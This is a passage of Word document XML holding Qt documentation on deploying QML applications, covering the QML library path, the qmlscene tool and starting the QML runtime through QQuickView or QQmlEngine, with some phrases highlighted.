          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:t>For more information, visit:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C0C2B" w:rsidRPr="007C0C2B" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId363" w:history="1">
        <w:r w:rsidR="007C0C2B" w:rsidRPr="007C0C2B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>Deploying Qt Applications</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="007C0C2B" w:rsidRPr="007C0C2B" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId364" w:history="1">
        <w:r w:rsidR="007C0C2B" w:rsidRPr="007C0C2B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>Running on Multiple Platforms</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="007C0C2B" w:rsidRPr="007C0C2B" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId365" w:history="1">
        <w:r w:rsidR="007C0C2B" w:rsidRPr="007C0C2B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>Deploying to Mobile Devices</w:t>
        </w:r>
      </w:hyperlink>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690F6E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>When running</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> applications on the target platform, the </w:t>
      </w:r>
      <w:r w:rsidRPr="007022E0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">application needs to </w:t>
      </w:r>
      <w:r w:rsidRPr="00690F6E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>access the location of the QML libraries</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. When using</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId366" w:history="1">
        <w:r w:rsidRPr="007C0C2B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qmake</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, the</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00690F6E">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QT_INSTALL_QML</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>environment points to the location of the libraries. The</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId367" w:history="1">
        <w:r w:rsidRPr="007022E0">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="FF0000"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Installers</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>install the QML libraries in</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;version&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;compiler&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/qml</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>directory.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C0C2B" w:rsidRPr="007C0C2B" w:rsidRDefault="007C0C2B" w:rsidP="007022E0">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="463" w:name="prototyping-with-qml-scene"/>
      <w:bookmarkStart w:id="464" w:name="_Toc483000630"/>
      <w:bookmarkStart w:id="465" w:name="_Toc483003647"/>
      <w:bookmarkStart w:id="466" w:name="_Toc483603983"/>
      <w:bookmarkStart w:id="467" w:name="_Toc483605203"/>
      <w:bookmarkEnd w:id="463"/>
      <w:r w:rsidRPr="007022E0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Prototyping with QML Scene</w:t>
      </w:r>
      <w:bookmarkEnd w:id="464"/>
      <w:bookmarkEnd w:id="465"/>
      <w:bookmarkEnd w:id="466"/>
      <w:bookmarkEnd w:id="467"/>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The Declarative UI package includes a QML runtime tool,</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId368" w:history="1">
        <w:r w:rsidRPr="00690F6E">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qmlscene</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, which loads and displays QML documents. This is useful during the application development phase </w:t>
      </w:r>
      <w:r w:rsidRPr="00690F6E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for prototyping QML-based applications</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> without writing your own C++ applications to invoke the QML runtime.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C0C2B" w:rsidRPr="007C0C2B" w:rsidRDefault="007C0C2B" w:rsidP="007022E0">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="468" w:name="initializing-the-qml-runtime-in-applicat"/>
      <w:bookmarkStart w:id="469" w:name="_Toc483000631"/>
      <w:bookmarkStart w:id="470" w:name="_Toc483003648"/>
      <w:bookmarkStart w:id="471" w:name="_Toc483603984"/>
      <w:bookmarkStart w:id="472" w:name="_Toc483605204"/>
      <w:bookmarkEnd w:id="468"/>
      <w:r w:rsidRPr="007022E0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Initializing the QML Runtime in Applications</w:t>
      </w:r>
      <w:bookmarkEnd w:id="469"/>
      <w:bookmarkEnd w:id="470"/>
      <w:bookmarkEnd w:id="471"/>
      <w:bookmarkEnd w:id="472"/>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 xml:space="preserve">To run an application that uses QML, the </w:t>
      </w:r>
      <w:r w:rsidRPr="00690F6E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML runtime must be invoked</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> by the application. This is done by writing a Qt C++ application that loads the</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId369" w:history="1">
        <w:r w:rsidRPr="007C0C2B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQmlEngine</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>by either:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C0C2B" w:rsidRPr="007C0C2B" w:rsidRDefault="007C0C2B" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Loading the QML file through a</w:t>
      </w:r>
      <w:r w:rsidR="007022E0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId370" w:history="1">
        <w:r w:rsidRPr="00690F6E">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickView</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="007022E0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>instance, or</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C0C2B" w:rsidRPr="007C0C2B" w:rsidRDefault="007C0C2B" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Creating a</w:t>
      </w:r>
      <w:r w:rsidR="007022E0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId371" w:history="1">
        <w:r w:rsidRPr="00690F6E">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQmlEngine</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="007022E0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>instance and loading QML files with</w:t>
      </w:r>
      <w:r w:rsidR="007022E0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId372" w:history="1">
        <w:r w:rsidRPr="007C0C2B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQmlComponent</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="007C0C2B" w:rsidRPr="007C0C2B" w:rsidRDefault="007C0C2B" w:rsidP="002863E6">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="473" w:name="initializing-with-qquickview"/>
      <w:bookmarkStart w:id="474" w:name="_Toc483000632"/>
      <w:bookmarkStart w:id="475" w:name="_Toc483003649"/>
      <w:bookmarkStart w:id="476" w:name="_Toc483603985"/>
      <w:bookmarkStart w:id="477" w:name="_Toc483605205"/>
      <w:bookmarkEnd w:id="473"/>
      <w:r w:rsidRPr="007022E0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Initializing with QQuickView</w:t>
      </w:r>
      <w:bookmarkEnd w:id="474"/>
      <w:bookmarkEnd w:id="475"/>
      <w:bookmarkEnd w:id="476"/>
      <w:bookmarkEnd w:id="477"/>
    </w:p>
    <w:p w:rsidR="007C0C2B" w:rsidRPr="007C0C2B" w:rsidRDefault="00490E7E" w:rsidP="007C0C2B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId373" w:history="1">
        <w:r w:rsidR="007C0C2B" w:rsidRPr="00690F6E">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickView</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="005D408B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007C0C2B" w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is a</w:t>
      </w:r>
      <w:r w:rsidR="005D408B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId374" w:history="1">
        <w:r w:rsidR="007C0C2B" w:rsidRPr="007C0C2B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QWindow</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="007C0C2B" w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-based class that is able to load QML files. For example, if there is a QML file,</w:t>
      </w:r>
      <w:r w:rsidR="007C0C2B" w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="007C0C2B" w:rsidRPr="007C0C2B">
        <w:rPr>
